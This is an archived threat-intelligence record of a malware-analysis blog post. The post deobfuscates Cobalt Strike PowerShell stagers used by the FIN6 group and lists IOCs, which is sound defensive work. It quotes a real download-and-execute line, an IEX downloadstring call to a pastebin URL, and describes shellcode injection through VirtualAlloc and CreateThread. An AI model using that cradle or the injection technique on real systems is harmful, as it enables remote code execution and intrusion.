{
	"id": "08a21d23-d7d0-480b-b611-12d1bec390a1",
	"created_at": "2026-04-10T03:21:52.280314Z",
	"updated_at": "2026-04-10T13:13:01.474863Z",
	"deleted_at": null,
	"sha1_hash": "2f8eef5a57271a957206b2a4c60a03bdba48748f",
	"title": "Cobalt Strike stagers used by FIN6 :: MWLab — Ladislav's Malware Lab",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 692236,
	"plain_text": "Cobalt Strike stagers used by FIN6 :: MWLab — Ladislav's Malware Lab\r\nPublished: 2020-07-07 · Archived: 2026-04-10 02:49:38 UTC\r\nIn June, the LIFARS team worked on an engagement related to the FIN6 threat actor. FIN6 was also detected and described in April and May by other forensics firms, including SentinelOne and FireEye Managed Defense (Mandiant), which described an intrusion by FIN6 and the group's latest tactics, techniques, and procedures (TTPs). In particular, FIN6 also used the LockerGoga and Ryuk ransomware families, and Cobalt Strike for initial compromise and lateral movement. Even three months after those posts were published, some of the URLs for the Cobalt Strike stagers were still active, so I decided to publish an analysis of these Cobalt Strike stagers and payloads.\r\nCobalt Strike\r\nAs described on the Cobalt Strike website, it is “software for Adversary Simulations and Red Team Operations”. Yes, it is a commercial tool, priced at $3,500 per user for one year, and it is used by many pentesters and red teamers as well as by advanced threat actors such as APT19, APT29, APT32, Leviathan, Cobalt Group and FIN6. Again, the official website says:\r\n“Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer’s network”.\r\nTherefore it is a somewhat more interesting piece of malware than relatively common backdoors, RATs and Metasploit payloads.\r\nHttpsStagers\r\nThere are a couple of IOCs in the FireEye post, including links to the pastebin website. Some of these URLs are still active at the time of writing this article, so let's pick one and look at it, e.g. hxxps://pastebin[.]com/raw/HPpvY00Q .\r\nFireEye mentions that “in some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com.” I can confirm this is exactly what I saw during some of the cases I worked on. There were simple PowerShell downloaders in the form of encoded commands, such as the one in Figure 1.\r\nFig. 1: Example of encoded PowerShell downloader\r\nAfter decoding, it is pretty straightforward: download a string from pastebin and invoke the expression:\r\nhttps://malwarelab.eu/posts/fin6-cobalt-strike/\r\nPage 1 of 4\r\nIEX ((new-object net.webclient).downloadstring('hxxps://pastebin[.]com/raw/HPpvY00Q'))\r\nNow, look at the content at the pastebin URL. It contains an approximately 7 kB payload, again the execution of an encoded PowerShell command in a hidden window.\r\nFig. 2: Payload downloaded from Pastebin\r\nAfter decoding, we get another long Base64-encoded string, this time also gzipped. So the next steps are obvious: decode the Base64 and decompress the GzipStream.\r\nFig. 3: Decoded Pastebin payload contains GZipStream encoded as Base64\r\nUsing Linux CLI tools, it can be done with the one-liner echo \"...\" | base64 -d | gunzip . Finally, we can see something which looks like unencoded PowerShell, but again with one Base64-encoded string.\r\nFig. 4: Decoded and gunzipped payload with another Base64-encoded string\r\nReviewing the code from Figure 4, we can see that there is a C# assembly which creates a new namespace called inject and is compiled in-memory. This namespace is a wrapper for the native functions VirtualAlloc , CreateThread and WaitForSingleObject from kernel32.dll. These functions are used to copy the content of the Base64-encoded string into executable memory and run it in a new thread. Therefore, the Base64-encoded string (decoded into $var_code ) contains shellcode.\r\nShellcode\r\nIn this article I will not dive too deeply into shellcode analysis. Instead, a very simple approach such as string extraction is enough to reveal some more IOCs and the essential purpose of the shellcode. So, let's do it. Again, Linux CLI tools can be very handy, and echo \"...\" | base64 -d | strings (or strings -n 7 ) does the job. We can see the extracted strings in Figure 5.\r\nFig. 5: Extracted strings from the shellcode\r\nThere is a clearly readable User-Agent and the IP address 185.202.174[.]91, so this shellcode is probably another downloader. This hypothesis can be verified by analysing the shellcode in a disassembler or in a shellcode debugger such as scdbg .\r\nClosing Notes\r\nThe Cobalt Strike HttpsStagers are used to deliver a further payload to the victim computers. The extracted shellcode can download and execute another binary payload from Cobalt Strike servers. These servers are often listening on TCP port 50050, which is the default port for the Cobalt Strike team server used by cooperating attackers or pentesters. Note that 50050 is the port the Cobalt Strike client uses to talk to the team server; the stager itself pulls the payload from the listener's HTTP/HTTPS port, so an exposed 50050 is a fingerprint of the team server rather than the download channel.\r\nI also saw some HttpsStagers with one more obfuscation step in place: the shellcode in $var_code was XORed with a one-byte value, but this requires only one more step in the analysis process, leading to the same results.\r\nFollowing the deobfuscation process from this analysis (multiple extractions and decodings of Base64-encoded strings, gunzip decompression, strings extraction), we can create a recipe for the CyberChef tool and automate this process. 
The recipe from this article, together with the content from the pastebin as input data, is available as this CyberChef Recipe.\r\nFig. 6: Analysis in CyberChef\r\nReferences\r\nhttps://lifars.com/2020/07/detecting-malware-capabilities-with-capa/\r\nhttps://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/\r\nhttps://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\r\nhttps://www.cobaltstrike.com/\r\nhttps://attack.mitre.org/software/S0154/\r\nhttps://gchq.github.io/CyberChef/\r\nCyberChef Recipe\r\nSource: https://malwarelab.eu/posts/fin6-cobalt-strike/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://malwarelab.eu/posts/fin6-cobalt-strike/"
	],
	"report_names": [
		"fin6-cobalt-strike"
	],
	"threat_actors": [],
	"ts_created_at": 1775791312,
	"ts_updated_at": 1775826781,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2f8eef5a57271a957206b2a4c60a03bdba48748f.pdf",
		"text": "https://archive.orkl.eu/2f8eef5a57271a957206b2a4c60a03bdba48748f.txt",
		"img": "https://archive.orkl.eu/2f8eef5a57271a957206b2a4c60a03bdba48748f.jpg"
	}
}